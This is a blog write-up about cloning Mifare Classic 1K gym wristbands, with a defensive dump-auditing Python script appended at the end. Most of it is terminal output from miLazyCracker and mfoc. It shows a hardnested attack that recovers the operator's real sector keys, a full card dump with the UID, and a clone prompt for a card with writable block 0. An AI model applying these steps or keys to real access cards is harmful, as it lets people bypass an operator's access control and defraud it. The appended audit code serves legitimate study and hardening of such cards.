Gym Wristband – Reverse Engineering

Goal: duplicating gym wristbands (Mifare Classic 1K)

Link to part two

First approaches

To duplicate the wristbands, we first need information about the chip.

NFC Tools Android App

https://play.google.com/store/apps/details?id=com.wakdev.wdnfc&hl=de

This app reports the following detected chip type:

-> Type: ISO 14443-3A

-> MifareClassic

Now that we know these are MIFARE chips, we can also try the official app:

https://play.google.com/store/apps/details?id=de.syss.MifareClassicTool&hl=de

MIFARE Classic Tool – MCT

-> UID

-> RF Technology – ISO/IEC 14443, Type A

-> Memory Size – 1024 byte

-> Block Size – 16 byte

Current status

Waiting for delivery of the ACR122U plus the cards with a writable block 0 (which, of course, are not available on Amazon)

ACS ACR122U USB 2.0 white smart card reader (USB 2.0, 65 x 12.8 x 98 mm, 70 g, Windows 2000, Windows 2000 Professional, Windows 7 Home Basic, Windows 7 Home Basic x64, Windows 7..., Android, ISO 14443, CE, FCC C, KC, VCCC. I, PC/SC, CCID, USB), by ACS
  • Supports the new Ultralight C (via pseudo-APDUs) and Plus SL1 (4-byte UID, via pseudo-APDUs) and SL3
  • Supports ISO 14443 Type A and B, FeliCa, and all 4 types of NFC (ISO/IEC 18092) tags
  • Read/write speed up to 424 kbps
  • CCID-compliant, PC/SC-compliant

Software: https://github.com/ilumitr/miLazyCracker

Accompanying video tutorial

miLazyCracker - Kevin Larson

Conclusion: the bundled software and mfcuk both refused to cooperate.

With miLazyCracker it finally worked.

The data is stored in encrypted form, so a matching key has to be found first before it can be decrypted.

Once that is done, the original data can be saved as a dump.

Execute miLazyCracker

Mathiass-MBP:dump mathias$ miLazyCracker
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [xxxx...........x]
[Key: a0a1a2a3a4a5] -> [xxxx...........x]
[Key: d3f7d3f7d3f7] -> [xxxx...........x]
[Key: 000000000000] -> [xxxx...........x]
[Key: b0b1b2b3b4b5] -> [xxxx...........x]
[Key: 4d3a99c351dd] -> [xxxx...........x]
[Key: 1a982c7e459a] -> [xxxx...........x]
[Key: aabbccddeeff] -> [xxxx...........x]
[Key: 714c5c886e97] -> [xxxx...........x]
[Key: 587ee5f9350f] -> [xxxx...........x]
[Key: a0478cc39091] -> [xxxx...........x]
[Key: 533cb6c723f6] -> [xxxx...........x]
[Key: 8fd0a4f256e9] -> [xxxx...........x]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Unknown Key A Unknown Key B
Sector 05 - Unknown Key A Unknown Key B
Sector 06 - Unknown Key A Unknown Key B
Sector 07 - Unknown Key A Unknown Key B
Sector 08 - Unknown Key A Unknown Key B
Sector 09 - Unknown Key A Unknown Key B
Sector 10 - Unknown Key A Unknown Key B
Sector 11 - Unknown Key A Unknown Key B
Sector 12 - Unknown Key A Unknown Key B
Sector 13 - Unknown Key A Unknown Key B
Sector 14 - Unknown Key A Unknown Key B
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff


Using sector 00 as an exploit sector
Card is not vulnerable to nested attack
MFOC not possible, detected hardened Mifare Classic
Trying HardNested Attack...
libnfc_crypto1_crack ffffffffffff 60 B 56 B mfc_04e8f9c2a55980_foundKeys.txt
Found tag with uid c2a55980, collecting nonces for key B of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15)
Collected 1775 nonces... leftover complexity 1186294334976 (~2^40.11) - press enter to start brute-force phase
Collected 1785 nonces... leftover complexity 1186294334976 (~2^40.11) - initializing brute-force phase...
Starting 8 threads to test 1186294334976 states using 256-way bitslicing
Cracking... 48.56%
Found key: 81cc25ebbb6a
Tested 576573835694 states
81cc25ebbb6a
mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt
The custom key 0x81cc25ebbb6a has been added to the default keys
No NFC device found.


Mathiass-MBP:dump mathias$ mfoc -O dump.dmp -k 81cc25ebbb6a
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.]
[Key: ffffffffffff] -> [xxxx\\\\\\\\\\\x]
[Key: a0a1a2a3a4a5] -> [xxxx\\\\\\\\\\\x]
[Key: d3f7d3f7d3f7] -> [xxxx\\\\\\\\\\\x]
[Key: 000000000000] -> [xxxx\\\\\\\\\\\x]
[Key: b0b1b2b3b4b5] -> [xxxx\\\\\\\\\\\x]
[Key: 4d3a99c351dd] -> [xxxx\\\\\\\\\\\x]
[Key: 1a982c7e459a] -> [xxxx\\\\\\\\\\\x]
[Key: aabbccddeeff] -> [xxxx\\\\\\\\\\\x]
[Key: 714c5c886e97] -> [xxxx\\\\\\\\\\\x]
[Key: 587ee5f9350f] -> [xxxx\\\\\\\\\\\x]
[Key: a0478cc39091] -> [xxxx\\\\\\\\\\\x]
[Key: 533cb6c723f6] -> [xxxx\\\\\\\\\\\x]
[Key: 8fd0a4f256e9] -> [xxxx\\\\\\\\\\\x]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 05 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 06 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 07 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 08 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 09 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 10 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 11 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 12 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 13 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 14 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff


Using sector 00 as an exploit sector
Card is not vulnerable to nested attack


Using sector 00 as an exploit sector
Card is not vulnerable to nested attack
MFOC not possible, detected hardened Mifare Classic
Trying HardNested Attack...
libnfc_crypto1_crack ffffffffffff 60 B 56 A mfc_04e8f9c2a55980_foundKeys.txt
Found tag with uid c2a55980, collecting nonces for key A of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15)
Collected 1283 nonces... leftover complexity 1922805806080 (~2^40.81) - press enter to start brute-force phase
Collected 1293 nonces... leftover complexity 1922805806080 (~2^40.81) - initializing brute-force phase...
Starting 8 threads to test 1922805806080 states using 256-way bitslicing
Cracking... 78.71%
Found key: 3e65e4fb65b3
Tested 1513544667086 states
81cc25ebbb6a
3e65e4fb65b3
mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt
The custom key 0x81cc25ebbb6a has been added to the default keys
The custom key 0x3e65e4fb65b3 has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.]
[Key: 3e65e4fb65b3] -> [....xxxxxxxxxxx.]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 05 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 06 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 07 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 08 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 09 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 10 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 11 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 12 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 13 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 14 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 53, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 52, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 51, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 50, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 49, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 48, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 47, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 46, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 45, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 44, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 43, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 42, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 41, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 40, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 39, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 38, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 37, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 36, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 35, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 34, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 33, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 32, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 31, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 30, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 29, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 28, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 27, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 26, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 25, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 24, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 23, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 22, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 21, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 80
Block 20, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 00 00 00 80
Block 19, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 18, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 17, type A, key 3e65e4fb65b3 :00 59 32 8a 59 d0 4e a6 00 2a 80 09 00 00 00 23
Block 16, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 59 d2 ff f4
Block 15, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 14, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 13, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 12, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 11, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 10, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00


Dump left in: mfc_04e8f9c2a55980_dump.mfd
Do you want clone the card? Place card on reader now and press Y [y/n] y
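To make sense of the dump above, here is an added example that is not code from the post, from mfoc or from miLazyCracker: it parses mfoc's "Block NN, type A, key ... :" lines, decodes the sector-trailer access bits using the layout from the NXP MF1S50 datasheet, and flags the sectors an issuer would want to re-key, i.e. those still opened by a well-known default key or left in the factory transport configuration. The sample input is the subset of the dump lines above for sectors 0, 4 and 15, and the default-key list is the one mfoc tried above; everything else (function names, report format) is this example's own. Decoding the two trailer patterns in the dump shows that ff 07 80 69 is the transport configuration (everything accessible with key A, key B readable, which is why it dumps as ff ff ff ff ff ff), while 78 77 88 69 makes the data blocks readable with key A or B but writable only with key B, and hides key B (which is why those trailers dump as zeros).

```python
"""Audit a Mifare Classic 1K dump as printed by mfoc.

Added example for this post (not code from mfoc, miLazyCracker or the post's author).
It parses the "Block NN, type A, key ... :" lines shown above, decodes the sector-trailer
access bits (layout per the NXP MF1S50 datasheet) and flags sectors that still use
well-known default keys or the factory transport configuration."""
import re

# Constructed sample input: the dump lines printed above for sectors 0, 4 and 15.
SAMPLE_DUMP = """\
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 19, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 18, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 17, type A, key 3e65e4fb65b3 :00 59 32 8a 59 d0 4e a6 00 2a 80 09 00 00 00 23
Block 16, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 59 d2 ff f4
Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00
"""

# Well-known default keys (the list mfoc tried above); a fielded card using one is a finding.
DEFAULT_KEYS = {"ffffffffffff", "a0a1a2a3a4a5", "d3f7d3f7d3f7",
                "000000000000", "b0b1b2b3b4b5", "aabbccddeeff"}
LINE_RE = re.compile(r"^Block (\d+), type ([AB]), key ([0-9a-f]{12}) :((?:[0-9a-f]{2} ?){16})$")

# Data-block conditions by (C1, C2, C3): who may read, write, increment, decrement/transfer/restore.
DATA_RULES = {
    (0, 0, 0): ("key A|B", "key A|B", "key A|B", "key A|B"),  # transport configuration
    (0, 1, 0): ("key A|B", "never", "never", "never"),
    (1, 0, 0): ("key A|B", "key B", "never", "never"),
    (1, 1, 0): ("key A|B", "key B", "key B", "key A|B"),
    (0, 0, 1): ("key A|B", "never", "never", "key A|B"),
    (0, 1, 1): ("key B", "key B", "never", "never"),
    (1, 0, 1): ("key B", "never", "never", "never"),
    (1, 1, 1): ("never", "never", "never", "never"),
}
# Trailer conditions by (C1, C2, C3): who may write key A, write the access bits, read key B, write key B.
TRAILER_RULES = {
    (0, 0, 0): ("key A", "never", "key A", "key A"),
    (0, 1, 0): ("never", "never", "key A", "never"),
    (1, 0, 0): ("key B", "never", "never", "key B"),
    (1, 1, 0): ("never", "never", "never", "never"),
    (0, 0, 1): ("key A", "key A", "key A", "key A"),  # transport configuration (ff 07 80 above)
    (0, 1, 1): ("key B", "key B", "never", "key B"),  # the 78 77 88 trailers above
    (1, 0, 1): ("never", "key B", "never", "never"),
    (1, 1, 1): ("never", "never", "never", "never"),
}

def parse_dump(text):
    """Map block number -> (key type used, key hex, 16 data bytes) for each dump line."""
    blocks = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            num, ktype, key, hexdata = m.groups()
            blocks[int(num)] = (ktype, key, bytes.fromhex(hexdata.replace(" ", "")))
    return blocks

def decode_access_bits(trailer):
    """Return [(C1, C2, C3) of block 0..3] from trailer bytes 6..8.
    Byte 6 = ~C2[3..0] | ~C1[3..0], byte 7 = C1[3..0] | ~C3[3..0], byte 8 = C3[3..0] | C2[3..0];
    bit i of each nibble belongs to block i. Inconsistent inverted copies make the chip reject
    the trailer and the sector becomes inaccessible, so they are rejected here as well."""
    b6, b7, b8 = trailer[6], trailer[7], trailer[8]
    c1, c2, c3 = (b7 >> 4) & 0xF, b8 & 0xF, (b8 >> 4) & 0xF
    if (~b6 & 0xF) != c1 or ((~b6 >> 4) & 0xF) != c2 or (~b7 & 0xF) != c3:
        raise ValueError("access bits fail the inverted-copy consistency check")
    return [((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)]

def card_uid(blocks):
    """UID from the manufacturer block. The tag above reports "UID size: double" (7-byte UID),
    so the UID is bytes 0..6 of block 0; 4-byte-UID cards use bytes 0..3 followed by a BCC."""
    return blocks[0][2][:7].hex()

def audit_sector(blocks, sector):
    """Decode one 4-block sector and list the weaknesses an issuer would want to fix."""
    ktype, key_used, trailer = blocks[sector * 4 + 3]
    bits = decode_access_bits(trailer)
    trailer_rule = TRAILER_RULES[bits[3]]
    # Key A (bytes 0..5) never reads back; key B (bytes 10..15) reads back only if allowed,
    # otherwise the card returns zeros, which must not be mistaken for the 000000000000 default.
    key_b = trailer[10:16].hex() if trailer_rule[2] != "never" else None
    findings = []
    if key_used in DEFAULT_KEYS:
        findings.append(f"sector opened with well-known default key {ktype} {key_used}")
    if bits[3] == (0, 0, 1):
        findings.append("trailer still in transport configuration (key B readable with key A)")
    if key_b in DEFAULT_KEYS:
        findings.append(f"key B {key_b} is a well-known default and readable from the card")
    for i in range(3):
        block_no = sector * 4 + i
        # Block 0 is the manufacturer block and read-only in hardware on genuine cards.
        if block_no != 0 and DATA_RULES[bits[i]][1] == "key A|B":
            findings.append(f"block {block_no} writable with the same key that reads it")
    return {"sector": sector, "data_blocks": [DATA_RULES[b] for b in bits[:3]],
            "trailer": trailer_rule, "findings": findings}

def audit_card(blocks):
    """Audit every sector whose four blocks are present in the dump."""
    complete = {n // 4 for n in blocks if all(n // 4 * 4 + i in blocks for i in range(4))}
    return [audit_sector(blocks, s) for s in sorted(complete)]

if __name__ == "__main__":
    for report in audit_card(parse_dump(SAMPLE_DUMP)):
        print(f"sector {report['sector']:2d}:", "; ".join(report["findings"]) or "no findings")
```

Run against the sample, sectors 0 and 15 produce findings (default key, transport trailer, readable default key B, freely writable data blocks) while sector 4 produces none: its data blocks are read-only for the key that opened them and key B is neither readable nor a default. The split into a read key A and a write key B is what kept mfoc from reading sectors 4-14 until the hardnested step above recovered both keys; an issuer auditing a batch of cards would feed full mfoc dumps through audit_card and treat any non-empty findings list as a sector to re-key.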